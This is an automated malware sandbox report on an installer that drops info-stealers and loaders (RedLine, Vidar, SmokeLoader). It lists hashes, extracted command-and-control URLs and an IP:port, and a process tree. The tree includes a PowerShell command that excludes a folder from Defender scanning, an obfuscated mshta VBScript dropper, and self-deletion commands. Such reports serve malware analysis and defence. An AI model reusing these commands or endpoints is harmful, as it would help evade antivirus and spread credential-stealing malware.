Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
setup_x86_...ll.exe
windows10_x64
setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
02-12-2021 07:35
211202-je6zgsfge4 1010-09-2021 20:31
210910-za2rzaaeh3 1010-09-2021 19:40
210910-ydvmdsdffp 1010-09-2021 12:06
210910-n9s4bsdbep 1010-09-2021 05:37
210910-gbjcxahdh2 1009-09-2021 22:16
210909-17av7aghb7 1009-09-2021 22:12
210909-14mqksgha9 1009-09-2021 22:12
210909-14l42sgha8 1009-09-2021 22:11
210909-14e1qsgha7 1009-09-2021 22:11
210909-138lnacacn 10Analysis
-
max time kernel
28s -
max time network
157s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
09-09-2021 22:12
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-jp
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-fr
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win7-de
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-fr
Behavioral task
behavioral9
Sample
setup_x86_x64_install.exe
Resource
win10-en
Errors
General
-
Target
setup_x86_x64_install.exe
-
Size
4.3MB
-
MD5
6d18c8e8ab9051f7a70b89ff7bb0ec35
-
SHA1
265311e2afd9f59e824f4b77162cf3dfa278eb7e
-
SHA256
8fe6c86b038ce91a991fe6eb8a9b323bb37b554ff6b4e5c18de3fe52d4aedf6d
-
SHA512
249bf79dc90d4662b942c7eed2a7b7816b749f6d5f7bc190bba05f826fa143d0b44f58054d8649b8626884c5fcbd1cea8abd625dc701d44b7aaac84fc74e47ff
Malware Config
Extracted
http://shellloader.com/welcome
Extracted
vidar
40.5
706
https://gheorghip.tumblr.com/
-
profile_id
706
Extracted
redline
pab123
45.14.49.169:22411
Extracted
smokeloader
2020
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5828 3596 rundll32.exe 15 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6136 3596 rundll32.exe 15 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6208 3596 rundll32.exe 15 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
resource yara_rule behavioral6/memory/3164-249-0x0000000004860000-0x000000000487F000-memory.dmp family_redline behavioral6/memory/3164-268-0x0000000004960000-0x000000000497E000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral6/files/0x000100000001ab41-144.dat family_socelars behavioral6/files/0x000100000001ab41-180.dat family_socelars -
Vidar Stealer 2 IoCs
resource yara_rule behavioral6/memory/1320-244-0x0000000004940000-0x0000000004A11000-memory.dmp family_vidar behavioral6/memory/1320-258-0x0000000000400000-0x0000000002BC5000-memory.dmp family_vidar -
resource yara_rule behavioral6/files/0x000100000001ab34-121.dat aspack_v212_v242 behavioral6/files/0x000100000001ab34-124.dat aspack_v212_v242 behavioral6/files/0x000100000001ab36-128.dat aspack_v212_v242 behavioral6/files/0x000100000001ab36-127.dat aspack_v212_v242 behavioral6/files/0x000100000001ab33-122.dat aspack_v212_v242 behavioral6/files/0x000100000001ab33-130.dat aspack_v212_v242 behavioral6/files/0x000100000001ab33-129.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 23 IoCs
pid Process 3256 setup_installer.exe 908 setup_install.exe 212 Thu21b9847cb6727.exe 2976 Thu21df5caa1b78de6.exe 3748 Thu2102ff6cfe07c.exe 3500 Thu21b93295136197.exe 2720 Thu2164f292a11ce.exe 3792 Thu21a1ef054cac78a.exe 3164 Thu21624565bb917a.exe 424 Thu219d5fe8cf316.exe 3228 Thu214aaca5625.exe 1148 Thu21568b0ab8.exe 2272 Thu2156de5489c19.exe 1320 Thu214ce31cede21.exe 4244 Thu214aaca5625.tmp 4276 Thu21b93295136197.tmp 4700 LzmwAqmV.exe 4848 2255364.exe 4864 cmd.exe 4952 PublicDwlBrowser1100.exe 5032 2.exe 5044 46807GHF____.exe 5060 2876683.exe -
Loads dropped DLL 9 IoCs
pid Process 908 setup_install.exe 908 setup_install.exe 908 setup_install.exe 908 setup_install.exe 908 setup_install.exe 908 setup_install.exe 4276 Thu21b93295136197.tmp 4276 Thu21b93295136197.tmp 4244 Thu214aaca5625.tmp -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 192 ipinfo.io 13 ip-api.com 20 ipinfo.io 22 ipinfo.io 125 ip-api.com 190 ipinfo.io -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 16 IoCs
pid pid_target Process procid_target 1284 2976 WerFault.exe 94 2968 5032 WerFault.exe 114 5520 3160 WerFault.exe 112 5820 2976 WerFault.exe 94 5944 3160 WerFault.exe 112 4820 2976 WerFault.exe 94 5340 3160 WerFault.exe 112 1284 2976 WerFault.exe 94 4956 3160 WerFault.exe 112 4912 3160 WerFault.exe 112 5244 3160 WerFault.exe 112 5544 2976 WerFault.exe 94 5656 3160 WerFault.exe 112 5400 2976 WerFault.exe 94 4200 2976 WerFault.exe 94 5104 4848 WerFault.exe 108 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Thu2164f292a11ce.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Thu2164f292a11ce.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Thu2164f292a11ce.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6632 schtasks.exe 6056 schtasks.exe 5340 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 6220 timeout.exe -
Kills process with taskkill 3 IoCs
pid Process 5360 taskkill.exe 5208 taskkill.exe 5688 taskkill.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 656 PING.EXE -
Script User-Agent 5 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 19 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 21 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 22 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 33 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 191 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2720 Thu2164f292a11ce.exe 2720 Thu2164f292a11ce.exe 3788 powershell.exe 3788 powershell.exe -
Suspicious use of AdjustPrivilegeToken 40 IoCs
description pid Process Token: SeCreateTokenPrivilege 3792 Thu21a1ef054cac78a.exe Token: SeAssignPrimaryTokenPrivilege 3792 Thu21a1ef054cac78a.exe Token: SeLockMemoryPrivilege 3792 Thu21a1ef054cac78a.exe Token: SeIncreaseQuotaPrivilege 3792 Thu21a1ef054cac78a.exe Token: SeMachineAccountPrivilege 3792 Thu21a1ef054cac78a.exe Token: SeTcbPrivilege 3792 Thu21a1ef054cac78a.exe Token: SeSecurityPrivilege 3792 Thu21a1ef054cac78a.exe Token: SeTakeOwnershipPrivilege 3792 Thu21a1ef054cac78a.exe Token: SeLoadDriverPrivilege 3792 Thu21a1ef054cac78a.exe Token: SeSystemProfilePrivilege 3792 Thu21a1ef054cac78a.exe Token: SeSystemtimePrivilege 3792 Thu21a1ef054cac78a.exe Token: SeProfSingleProcessPrivilege 3792 Thu21a1ef054cac78a.exe Token: SeIncBasePriorityPrivilege 3792 Thu21a1ef054cac78a.exe Token: SeCreatePagefilePrivilege 3792 Thu21a1ef054cac78a.exe Token: SeCreatePermanentPrivilege 3792 Thu21a1ef054cac78a.exe Token: SeBackupPrivilege 3792 Thu21a1ef054cac78a.exe Token: SeRestorePrivilege 3792 Thu21a1ef054cac78a.exe Token: SeShutdownPrivilege 3792 Thu21a1ef054cac78a.exe Token: SeDebugPrivilege 3792 Thu21a1ef054cac78a.exe Token: SeAuditPrivilege 3792 Thu21a1ef054cac78a.exe Token: SeSystemEnvironmentPrivilege 3792 Thu21a1ef054cac78a.exe Token: SeChangeNotifyPrivilege 3792 Thu21a1ef054cac78a.exe Token: SeRemoteShutdownPrivilege 3792 Thu21a1ef054cac78a.exe Token: SeUndockPrivilege 3792 Thu21a1ef054cac78a.exe Token: SeSyncAgentPrivilege 3792 Thu21a1ef054cac78a.exe Token: SeEnableDelegationPrivilege 3792 Thu21a1ef054cac78a.exe Token: SeManageVolumePrivilege 3792 Thu21a1ef054cac78a.exe Token: SeImpersonatePrivilege 3792 Thu21a1ef054cac78a.exe Token: SeCreateGlobalPrivilege 3792 Thu21a1ef054cac78a.exe Token: 31 3792 Thu21a1ef054cac78a.exe Token: 32 3792 Thu21a1ef054cac78a.exe Token: 33 3792 Thu21a1ef054cac78a.exe Token: 34 3792 Thu21a1ef054cac78a.exe Token: 35 3792 Thu21a1ef054cac78a.exe Token: SeDebugPrivilege 1148 Thu21568b0ab8.exe Token: SeDebugPrivilege 424 Thu219d5fe8cf316.exe Token: SeDebugPrivilege 3788 powershell.exe Token: SeDebugPrivilege 2272 Thu2156de5489c19.exe Token: SeDebugPrivilege 5032 2.exe Token: SeDebugPrivilege 4848 2255364.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4276 Thu21b93295136197.tmp -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 856 wrote to memory of 3256 856 setup_x86_x64_install.exe 75 PID 856 wrote to memory of 3256 856 setup_x86_x64_install.exe 75 PID 856 wrote to memory of 3256 856 setup_x86_x64_install.exe 75 PID 3256 wrote to memory of 908 3256 setup_installer.exe 76 PID 3256 wrote to memory of 908 3256 setup_installer.exe 76 PID 3256 wrote to memory of 908 3256 setup_installer.exe 76 PID 908 wrote to memory of 3344 908 setup_install.exe 79 PID 908 wrote to memory of 3344 908 setup_install.exe 79 PID 908 wrote to memory of 3344 908 setup_install.exe 79 PID 908 wrote to memory of 2100 908 setup_install.exe 80 PID 908 wrote to memory of 2100 908 setup_install.exe 80 PID 908 wrote to memory of 2100 908 setup_install.exe 80 PID 908 wrote to memory of 2304 908 setup_install.exe 82 PID 908 wrote to memory of 2304 908 setup_install.exe 82 PID 908 wrote to memory of 2304 908 setup_install.exe 82 PID 908 wrote to memory of 1272 908 setup_install.exe 81 PID 908 wrote to memory of 1272 908 setup_install.exe 81 PID 908 wrote to memory of 1272 908 setup_install.exe 81 PID 908 wrote to memory of 656 908 setup_install.exe 83 PID 908 wrote to memory of 656 908 setup_install.exe 83 PID 908 wrote to memory of 656 908 setup_install.exe 83 PID 908 wrote to memory of 2212 908 setup_install.exe 84 PID 908 wrote to memory of 2212 908 setup_install.exe 84 PID 908 wrote to memory of 2212 908 setup_install.exe 84 PID 908 wrote to memory of 2188 908 setup_install.exe 86 PID 908 wrote to memory of 2188 908 setup_install.exe 86 PID 908 wrote to memory of 2188 908 setup_install.exe 86 PID 908 wrote to memory of 3868 908 setup_install.exe 85 PID 908 wrote to memory of 3868 908 setup_install.exe 85 PID 908 wrote to memory of 3868 908 setup_install.exe 85 PID 908 wrote to memory of 2864 908 setup_install.exe 92 PID 908 wrote to memory of 2864 908 setup_install.exe 92 PID 908 wrote to memory of 2864 908 setup_install.exe 92 PID 908 wrote to memory of 3984 908 setup_install.exe 87 PID 908 wrote to memory of 3984 908 setup_install.exe 87 PID 908 wrote to memory of 3984 908 setup_install.exe 87 PID 908 wrote to memory of 1576 908 setup_install.exe 88 PID 908 wrote to memory of 1576 908 setup_install.exe 88 PID 908 wrote to memory of 1576 908 setup_install.exe 88 PID 3344 wrote to memory of 3788 3344 cmd.exe 89 PID 3344 wrote to memory of 3788 3344 cmd.exe 89 PID 3344 wrote to memory of 3788 3344 cmd.exe 89 PID 908 wrote to memory of 3188 908 setup_install.exe 90 PID 908 wrote to memory of 3188 908 setup_install.exe 90 PID 908 wrote to memory of 3188 908 setup_install.exe 90 PID 908 wrote to memory of 2216 908 setup_install.exe 91 PID 908 wrote to memory of 2216 908 setup_install.exe 91 PID 908 wrote to memory of 2216 908 setup_install.exe 91 PID 2188 wrote to memory of 212 2188 cmd.exe 93 PID 2188 wrote to memory of 212 2188 cmd.exe 93 PID 3984 wrote to memory of 2976 3984 cmd.exe 94 PID 3984 wrote to memory of 2976 3984 cmd.exe 94 PID 3984 wrote to memory of 2976 3984 cmd.exe 94 PID 2212 wrote to memory of 3500 2212 cmd.exe 95 PID 2212 wrote to memory of 3500 2212 cmd.exe 95 PID 2212 wrote to memory of 3500 2212 cmd.exe 95 PID 2216 wrote to memory of 3748 2216 cmd.exe 96 PID 2216 wrote to memory of 3748 2216 cmd.exe 96 PID 2216 wrote to memory of 3748 2216 cmd.exe 96 PID 656 wrote to memory of 2720 656 cmd.exe 104 PID 656 wrote to memory of 2720 656 cmd.exe 104 PID 656 wrote to memory of 2720 656 cmd.exe 104 PID 1272 wrote to memory of 3792 1272 cmd.exe 103 PID 1272 wrote to memory of 3792 1272 cmd.exe 103
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:856 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3256 -
C:\Users\Admin\AppData\Local\Temp\7zS8BC2D2E4\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS8BC2D2E4\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:908 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:3344 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3788
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu219d5fe8cf316.exe4⤵PID:2100
-
C:\Users\Admin\AppData\Local\Temp\7zS8BC2D2E4\Thu219d5fe8cf316.exeThu219d5fe8cf316.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:424 -
C:\ProgramData\2255364.exe"C:\ProgramData\2255364.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4848 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4848 -s 19487⤵
- Program crash
PID:5104
-
-
-
C:\ProgramData\2876683.exe"C:\ProgramData\2876683.exe"6⤵
- Executes dropped EXE
PID:5060 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵PID:5376
-
-
-
C:\ProgramData\4711949.exe"C:\ProgramData\4711949.exe"6⤵PID:1244
-
-
C:\ProgramData\8604631.exe"C:\ProgramData\8604631.exe"6⤵PID:5840
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRIPT: cLOsE(creatEoBjECT ( "wScRiPt.shELl"). RuN ("CMD /c TypE ""C:\ProgramData\8604631.exe"" > gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if """" =="""" for %B iN ( ""C:\ProgramData\8604631.exe"" ) do taskkill /Im ""%~NxB"" /F " ,0 , tRUe) )7⤵PID:4420
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c TypE "C:\ProgramData\8604631.exe"> gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if "" =="" for %B iN ( "C:\ProgramData\8604631.exe" ) do taskkill /Im "%~NxB" /F8⤵PID:5520
-
C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXEGZ9~4QZ~O.EXe -P6_oIH__Ioj5q9⤵PID:4696
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRIPT: cLOsE(creatEoBjECT ( "wScRiPt.shELl"). RuN ("CMD /c TypE ""C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE"" > gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if ""-P6_oIH__Ioj5q "" =="""" for %B iN ( ""C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE"" ) do taskkill /Im ""%~NxB"" /F " ,0 , tRUe) )10⤵PID:6376
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c TypE "C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE"> gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if "-P6_oIH__Ioj5q " =="" for %B iN ( "C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE" ) do taskkill /Im "%~NxB" /F11⤵PID:7160
-
-
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" T~DJNB.F -u /S10⤵PID:7120
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /Im "8604631.exe" /F9⤵
- Kills process with taskkill
PID:5688
-
-
-
-
-
C:\ProgramData\8051349.exe"C:\ProgramData\8051349.exe"6⤵PID:6116
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21a1ef054cac78a.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1272 -
C:\Users\Admin\AppData\Local\Temp\7zS8BC2D2E4\Thu21a1ef054cac78a.exeThu21a1ef054cac78a.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3792 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:5960
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:5360
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21624565bb917a.exe4⤵PID:2304
-
C:\Users\Admin\AppData\Local\Temp\7zS8BC2D2E4\Thu21624565bb917a.exeThu21624565bb917a.exe5⤵
- Executes dropped EXE
PID:3164
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2164f292a11ce.exe4⤵
- Suspicious use of WriteProcessMemory
PID:656 -
C:\Users\Admin\AppData\Local\Temp\7zS8BC2D2E4\Thu2164f292a11ce.exeThu2164f292a11ce.exe5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:2720
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21b93295136197.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Users\Admin\AppData\Local\Temp\7zS8BC2D2E4\Thu21b93295136197.exeThu21b93295136197.exe5⤵
- Executes dropped EXE
PID:3500 -
C:\Users\Admin\AppData\Local\Temp\is-NU9TH.tmp\Thu21b93295136197.tmp"C:\Users\Admin\AppData\Local\Temp\is-NU9TH.tmp\Thu21b93295136197.tmp" /SL5="$50062,138429,56832,C:\Users\Admin\AppData\Local\Temp\7zS8BC2D2E4\Thu21b93295136197.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4276 -
C:\Users\Admin\AppData\Local\Temp\is-55115.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-55115.tmp\Setup.exe" /Verysilent7⤵PID:4516
-
C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent8⤵PID:3724
-
C:\Users\Admin\AppData\Local\Temp\is-O6347.tmp\stats.tmp"C:\Users\Admin\AppData\Local\Temp\is-O6347.tmp\stats.tmp" /SL5="$20334,138429,56832,C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent9⤵PID:6640
-
-
-
C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"8⤵PID:7100
-
C:\Users\Admin\AppData\Local\Temp\BSKR.exe"C:\Users\Admin\AppData\Local\Temp\BSKR.exe"9⤵PID:5144
-
C:\Users\Admin\AppData\Local\Temp\BSKR.exeC:\Users\Admin\AppData\Local\Temp\BSKR.exe10⤵PID:4420
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser144.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser144.exe"9⤵PID:6104
-
C:\Program Files (x86)\SmartPDF\SmartPDF\4618454.exe"4618454.exe"10⤵PID:6792
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu214ce31cede21.exe4⤵PID:3868
-
C:\Users\Admin\AppData\Local\Temp\7zS8BC2D2E4\Thu214ce31cede21.exeThu214ce31cede21.exe5⤵
- Executes dropped EXE
PID:1320 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Thu214ce31cede21.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS8BC2D2E4\Thu214ce31cede21.exe" & del C:\ProgramData\*.dll & exit6⤵PID:5828
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Thu214ce31cede21.exe /f7⤵
- Kills process with taskkill
PID:5208
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 67⤵
- Delays execution with timeout.exe
PID:6220
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21b9847cb6727.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Users\Admin\AppData\Local\Temp\7zS8BC2D2E4\Thu21b9847cb6727.exeThu21b9847cb6727.exe5⤵
- Executes dropped EXE
PID:212
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21df5caa1b78de6.exe /mixone4⤵
- Suspicious use of WriteProcessMemory
PID:3984 -
C:\Users\Admin\AppData\Local\Temp\7zS8BC2D2E4\Thu21df5caa1b78de6.exeThu21df5caa1b78de6.exe /mixone5⤵
- Executes dropped EXE
PID:2976 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2976 -s 6566⤵
- Program crash
PID:1284
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2976 -s 6726⤵
- Program crash
PID:5820
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2976 -s 6286⤵
- Program crash
PID:4820
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2976 -s 6566⤵
- Program crash
PID:1284
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2976 -s 8886⤵
- Program crash
PID:5544
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2976 -s 9366⤵
- Program crash
PID:5400
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2976 -s 11006⤵
- Program crash
PID:4200
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu214aaca5625.exe4⤵PID:1576
-
C:\Users\Admin\AppData\Local\Temp\7zS8BC2D2E4\Thu214aaca5625.exeThu214aaca5625.exe5⤵
- Executes dropped EXE
PID:3228 -
C:\Users\Admin\AppData\Local\Temp\is-709PA.tmp\Thu214aaca5625.tmp"C:\Users\Admin\AppData\Local\Temp\is-709PA.tmp\Thu214aaca5625.tmp" /SL5="$4004C,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS8BC2D2E4\Thu214aaca5625.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4244 -
C:\Users\Admin\AppData\Local\Temp\is-OO665.tmp\46807GHF____.exe"C:\Users\Admin\AppData\Local\Temp\is-OO665.tmp\46807GHF____.exe" /S /UID=burnerch27⤵
- Executes dropped EXE
PID:5044 -
C:\Program Files\Windows Security\JAZNKFOPLC\ultramediaburner.exe"C:\Program Files\Windows Security\JAZNKFOPLC\ultramediaburner.exe" /VERYSILENT8⤵PID:5156
-
C:\Users\Admin\AppData\Local\Temp\is-7K8GO.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-7K8GO.tmp\ultramediaburner.tmp" /SL5="$2043C,281924,62464,C:\Program Files\Windows Security\JAZNKFOPLC\ultramediaburner.exe" /VERYSILENT9⤵PID:4956
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵PID:4316
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\30-8b75d-254-6578c-d37acfe430f30\Jezhawuvaedae.exe"C:\Users\Admin\AppData\Local\Temp\30-8b75d-254-6578c-d37acfe430f30\Jezhawuvaedae.exe"8⤵PID:5612
-
-
C:\Users\Admin\AppData\Local\Temp\2c-7ecfe-25e-be1a4-986e7f5044eb1\Jisaenazhushae.exe"C:\Users\Admin\AppData\Local\Temp\2c-7ecfe-25e-be1a4-986e7f5044eb1\Jisaenazhushae.exe"8⤵PID:5712
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pqewroxg.fmx\GcleanerEU.exe /eufive & exit9⤵PID:6288
-
C:\Users\Admin\AppData\Local\Temp\pqewroxg.fmx\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\pqewroxg.fmx\GcleanerEU.exe /eufive10⤵PID:2116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uka4thpe.f2q\installer.exe /qn CAMPAIGN="654" & exit9⤵PID:5320
-
C:\Users\Admin\AppData\Local\Temp\uka4thpe.f2q\installer.exeC:\Users\Admin\AppData\Local\Temp\uka4thpe.f2q\installer.exe /qn CAMPAIGN="654"10⤵PID:6824
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\uka4thpe.f2q\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\uka4thpe.f2q\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1630973250 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵PID:2104
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\beogdlcl.12t\anyname.exe & exit9⤵PID:7136
-
C:\Users\Admin\AppData\Local\Temp\beogdlcl.12t\anyname.exeC:\Users\Admin\AppData\Local\Temp\beogdlcl.12t\anyname.exe10⤵PID:6184
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mkybd3v5.hqi\gcleaner.exe /mixfive & exit9⤵
- Executes dropped EXE
PID:4864 -
C:\Users\Admin\AppData\Local\Temp\mkybd3v5.hqi\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\mkybd3v5.hqi\gcleaner.exe /mixfive10⤵PID:6780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r21rhn42.gbf\autosubplayer.exe /S & exit9⤵PID:5868
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21568b0ab8.exe4⤵PID:3188
-
